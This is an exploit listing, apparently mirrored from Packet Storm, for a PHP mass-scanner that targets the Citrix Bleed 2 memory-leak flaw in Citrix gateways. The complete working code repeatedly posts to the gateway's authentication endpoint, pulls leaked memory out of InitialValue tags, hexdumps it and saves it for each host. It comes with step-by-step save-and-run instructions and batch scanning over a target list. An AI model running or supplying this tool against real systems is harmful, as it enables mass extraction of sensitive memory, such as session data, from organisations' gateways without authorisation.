Share
## https://sploitus.com/exploit?id=PACKETSTORM:211999
=============================================================================================================================================
    | # Title     : Citrix Bleed 2 PHP Mass Scanner                                                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.citrix.com/                                                                                                     |
    =============================================================================================================================================
    
    POC : 
    
    [+] A high-speed mass-scanner written in PHP designed to test for data
        leakage through the CitrixBleed2 InitialValue extraction issue.
        The tool reproduces the functionality of the original Bash/Parallel
        scanner but works in restricted PHP environments.
    
    [Features]
    - Normalizes targets (host / URL)
    - Extracts <InitialValue> leak
    - Hexdumps results
    - Saves output per-target
    - Parallel-like batching (multi-curl)
    - No banned functions required
    
    [Usage]
    php citrixbleed2.php --host https://gw.example.com --requests 1000
    php citrixbleed2.php --file targets.txt --requests 5000 --out dumps
    
    [Output]
    - STDOUT live hexdumps
    - dump/<host>.hexdump saved automatically
    
    [Steps To Save & Execute]
    1. Open a code editor (Notepad / VS Code / nano)
    2. Copy the full PHP code below
    3. Save the file as: citrixbleed2.php
    4. Execute via terminal:
       php citrixbleed2.php --host https://target.com
    5. Ensure "dumps" folder is writable
    
    
    ====================================================================
    PHP Scanner Code
    ====================================================================
    
    <?php
    /*
     * CitrixBleed2 PHP Mass Scanner
     * by Indoushka
     */
    
    error_reporting(E_ALL);
    ini_set("display_errors", 1);
    
    $options = getopt("", [
        "host::",
        "file::",
        "requests::",
        "out::"
    ]);
    
    $requests = $options["requests"] ?? 100;
    $outDir   = $options["out"] ?? "dumps";
    $hostArg  = $options["host"] ?? "";
    $fileArg  = $options["file"] ?? "";
    
    if (!is_dir($outDir)) mkdir($outDir, 0777, true);
    
    function normalize($url) {
        $url = preg_replace("#^https?://#i", "", $url);
        $url = explode("/", $url)[0];
        return rtrim($url, "/");
    }
    
    function extract_iv($body) {
        preg_match_all("#<InitialValue>(.*?)</InitialValue>#s", $body, $m);
        $out = [];
        foreach ($m[1] as $val) {
            $clean = preg_replace('/[\r\n\t ]+/', '', $val);
            if ($clean !== "" && preg_match('/[^\x20-\x7E]/', $clean))
                $out[] = $clean;
        }
        return $out;
    }
    
    function hex_dump_str($data) {
        $hex = unpack('H*', $data)[1];
        $out = "";
        $i = 0;
        $len = strlen($hex);
        while ($i < $len) {
            $chunk = substr($hex, $i, 32);
            $ascii = "";
            for ($j = 0; $j < strlen($chunk); $j += 2) {
                $c = hexdec(substr($chunk, $j, 2));
                $ascii .= ($c >= 32 && $c <= 126) ? chr($c) : ".";
            }
            $out .= sprintf("%08x  %s  |%s|\n", $i/2,
                trim(chunk_split($chunk, 2, " ")),
                $ascii
            );
            $i += 32;
        }
        return $out;
    }
    
    function do_request($host) {
        $url = "https://{$host}/p/u/doAuthentication.do";
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => "login",
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        ]);
        $res = curl_exec($ch);
        curl_close($ch);
        return $res ?: "";
    }
    
    function run_host($rawHost, $count, $outDir) {
        $h = normalize($rawHost);
        $file = $outDir . "/" . $h . ".hexdump";
    
        for ($i=1; $i <= $count; $i++) {
            $body = do_request($h);
            $ivs  = extract_iv($body);
    
            foreach ($ivs as $iv) {
                $hex = hex_dump_str($iv);
                echo $hex . "\n";
                file_put_contents($file, $hex . "\n", FILE_APPEND);
            }
        }
    }
    
    if ($fileArg !== "") {
        $targets = file($fileArg, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        foreach ($targets as $t) run_host($t, $requests, $outDir);
    } else {
        if ($hostArg === "") die("[!] Missing --host or --file\n");
        run_host($hostArg, $requests, $outDir);
    }
    ?>
    
    ====================================================================
    Example Execution
    ====================================================================
    Single host scan:
    php citrixbleed2.php --host https://gateway.example.com --requests 5000
    
    Batch scan:
    php citrixbleed2.php --file targets.txt --requests 1000 --out dumps
    
    Output directory:
    dumps/<host>.hexdump
    
    Live STDOUT hexdumps are shown in real-time.
    
    ====================================================================
    Steps to Save and Execute
    ====================================================================
    1. Open a text editor
    2. Copy the entire PHP code
    3. Save as: citrixbleed2.php
    4. Create "dumps" folder if not exists
    5. Open terminal / CMD
    6. Execute:
       php citrixbleed2.php --host https://target.com
       php citrixbleed2.php --file targets.txt
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================